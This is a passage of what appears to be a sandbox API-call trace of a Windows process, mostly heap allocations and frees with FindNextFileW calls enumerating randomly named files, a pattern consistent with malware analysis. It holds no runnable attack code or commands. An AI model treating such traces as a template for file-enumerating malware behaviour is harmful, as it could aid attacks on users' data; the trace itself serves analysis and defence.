RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0251.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0251.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0251.556] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0251.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.556] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.557] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.557] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.558] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.561] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.562] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d5f6c90, ftCreationTime.dwHighDateTime=0x1d4ce26, ftLastAccessTime.dwLowDateTime=0xa917faa0, ftLastAccessTime.dwHighDateTime=0x1d4c8af, ftLastWriteTime.dwLowDateTime=0xa917faa0, ftLastWriteTime.dwHighDateTime=0x1d4c8af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9708, dwReserved1=0x25c6e50, cFileName="ditreDSOdEug3Tyrxp1", cAlternateFileName="DITRED~1")) returned 1 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.562] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.562] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.563] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35a8 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x249c7b0 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35a8 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.564] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.565] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.565] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eaf9690, ftCreationTime.dwHighDateTime=0x1d4caa6, ftLastAccessTime.dwLowDateTime=0xf62ebce0, ftLastAccessTime.dwHighDateTime=0x1d4d203, ftLastWriteTime.dwLowDateTime=0xf62ebce0, ftLastWriteTime.dwHighDateTime=0x1d4d203, nFileSizeHigh=0x0, nFileSizeLow=0x3fd3, dwReserved0=0x24aa8c0, dwReserved1=0x25c6e50, cFileName="HwKg28SMvdgN7pz7S.wav", cAlternateFileName="HWKG28~1.WAV")) returned 1 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35a8 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0251.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.565] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.566] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.567] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.567] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.568] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0251.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.568] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0f9410, ftCreationTime.dwHighDateTime=0x1d4d048, ftLastAccessTime.dwLowDateTime=0x6f26a9f0, ftLastAccessTime.dwHighDateTime=0x1d4c9b7, ftLastWriteTime.dwLowDateTime=0x6f26a9f0, ftLastWriteTime.dwHighDateTime=0x1d4c9b7, nFileSizeHigh=0x0, nFileSizeLow=0xa2ab, dwReserved0=0x24aaec0, dwReserved1=0x25c6e50, cFileName="LVDYQUpAZwEha.mp3", cAlternateFileName="LVDYQU~1.MP3")) returned 1 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0251.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 